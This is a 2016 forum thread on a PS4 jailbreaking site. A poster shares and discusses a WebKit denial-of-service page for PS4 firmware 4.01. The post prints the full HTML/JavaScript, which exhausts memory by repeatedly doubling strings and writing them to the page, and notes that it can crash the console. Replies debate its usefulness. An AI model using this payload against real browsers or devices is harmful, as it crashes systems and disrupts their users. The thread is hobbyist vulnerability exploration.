Join Us and become a Member for a Verified Badge to access private areas with the latest PS4 PKGs.
PS4 Jailbreaking       Thread starter Insityyy       Start date Oct 28, 2016 at 7:32 PM       15      
Status
Not open for further replies.
So, I found a vulnerability (Original found by Dr_IDE) that seems to work on PS4, I modified the HTML code a little, just to make it say Webkit crash at the top and to add a "start exploit" button, and to make it more reliable on the PS4 web browser.

Anyways, I have been testing this vulnerability out and it seems to sometimes crash the entire system and requires a reboot to be usable again.

I have a video of what it did after I tried this (after 1 reboot):

For all the people who want to try it right now, EdiTzZMoDz on twitter added the exploit to his site: http://ps4.editzz.net/dos401/index.html

Here is the code:
Basic Coding.. Crashes Phones... Mean not worth the time on ps4
Code:
<html>
<title>Not Enough Free System Memory DoS Exploit</title>
<head>
<script>
function dos()
 {
    var longunistring1 = unescape("%u4141%u4141");
    var longunistring2 = unescape("%u4242%u4242");
    var longunistring3 = unescape("%u4343%u4343");
    var longunistring4 = unescape("%u4444%u4444");
        var longunistring5 = unescape("%u4545%u4545");
    var longunistring6 = unescape("%u4646%u4646");
    var longunistring7 = unescape("%u4747%u4747");

for(i=0; i <= 950 ; ++i)
 {
        longunistring1+=longunistring1;
        longunistring2+=longunistring2;
        longunistring3+=longunistring3;
        longunistring4+=longunistring4;
        longunistring5+=longunistring5;
        longunistring6+=longunistring6;
        longunistring7+=longunistring7;
        document.write(longunistring1);
        document.write(longunistring2);
        document.write(longunistring3);
        document.write(longunistring4);
        document.write(longunistring5);
        document.write(longunistring6);
        document.write(longunistring7);
    }
    document.write(longunistring1);
    document.write(longunistring2);
    document.write(longunistring3);
    document.write(longunistring4);
    document.write(longunistring5);
    document.write(longunistring6);
    document.write(longunistring7);
}
</script>
</head>
<body>
<input type="button" value="Start Exploit" onclick="dos();">
</body>
</html>
PS4 4.01 Webkit DoS Exploit (Crashes Full System Sometimes).jpg

Comments

Im not really a clone as i didnt state it was "my own" work, i put a link to where i found it, and im just trying to help so why dont you just say you have seen it before in a better attitude ;)

Thanks for taking the time to do a write-up and video @Insityyy, mainpaged it even though as @VultraAID said this is likely known/useless/etc.

It's great to see people in the community actively looking for and testing various exploits, because we never know when one just might be the missing piece of the puzzle. :)

Something to do :D If it was up to me I'd post anything that interests me on the frontpage as I don't consider the frontpage special... it just summarizes forum threads in categories really.

I also would encourage others to do the same sharing their interests, such as your Road to Magic Leap for example. :)

Threads like this PS4 Jailbreak 4.05 could then be seen by more people who can argue over it being fake in the forum, debunk it, share their opinions and agree to disagree etc.

Or we could sit here with thumbs up our butts waiting for a PS4 jailbreak to come and post nothing til then, wasting the chance of getting to know everyone better in the community.

Keep in mind my goal with this project is to have fun, not to be a serious (aka boring!) news site as mentioned before I did that for years and am totally over it. :p

hmm but the title is a little false i think...its no exploit...

Maybe a vuln ? or an entry point ? but this must be tested...

Hmm if a system crashes it makes sometimes a dump...anyone tested if the ps4 writes maybe to a usb after a crash ?

hmm but the title is a little false i think...its no exploit...

Maybe a vuln ? or an entry point ? but this must be tested...

Hmm if a system crashes it makes sometimes a dump...anyone tested if the ps4 writes maybe to a usb after a crash ?
I just checked, and no, it doesn't write to the usb in any way.

Status
Not open for further replies.
Back